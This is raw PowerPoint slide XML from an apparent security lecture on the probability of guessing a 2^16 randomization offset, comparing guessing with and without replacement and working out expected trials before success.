              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>[success exact 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>]+</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Pr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>[success exact 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>] </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Picture 42" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5068888" y="5703888"/>
            <a:ext cx="3657600" cy="622300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1775897106"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="359"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow" advTm="359"/>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bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1863725"/>
            <a:ext cx="8493125" cy="727075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="90488" tIns="44450" rIns="90488" bIns="44450" numCol="1" anchor="ctr" anchorCtr="1" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="88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accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>W/O Replacement:</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Pr[Success</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>nth try] =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="88000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" kern="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Pr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>[Success on 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" kern="0" baseline="30000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> try] +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="88000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Pr</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>[Success</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> on 2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="30000" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> try] +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="88000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" kern="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Pr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" kern="0" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>[Success</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> on nth try]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="88000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="88000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct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mj-lt"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Picture 34" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6770688" y="2438400"/>
            <a:ext cx="622300" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3956673754"/>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xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="753"/>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Expected Value</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371601"/>
            <a:ext cx="8229600" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>E[X] is the expected value of rand. variable X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basically a weighted average</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p: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56073"/>
            <a:ext cx="6680200" cy="723900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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912166"/>
            <a:ext cx="3213100" cy="1511300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3299793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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xpected number of trials</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>before success</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect t="-170282" b="-170282"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="762000"/>
            <a:ext cx="3949985" cy="4972051"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect t="-68176" b="-68176"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="2743200"/>
            <a:ext cx="2133600" cy="2684653"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5067300" y="5051425"/>
            <a:ext cx="2324100" cy="673100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangular Callout 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3222419" y="1450167"/>
            <a:ext cx="3864181" cy="759634"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -18065"/>
              <a:gd name="adj2" fmla="val 95079"/>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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[success by nth try]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="5051425"/>
            <a:ext cx="1143000" cy="673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5" name="Right Brace 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4324350" y="2152650"/>
            <a:ext cx="304800" cy="1181100"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent5">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81548307"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="2606"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="26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2: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Randomized After Each Probe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Content Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pretend that each possible offset is written on a ball.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> balls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Re-randomizing is like selecting balls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>with replacement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>until we get the ball with the randomization offset written on it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1714500" y="5599111"/>
            <a:ext cx="2057400" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Connector 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4915694" y="5598317"/>
            <a:ext cx="2057400" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2743200" y="6627811"/>
            <a:ext cx="3200400" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
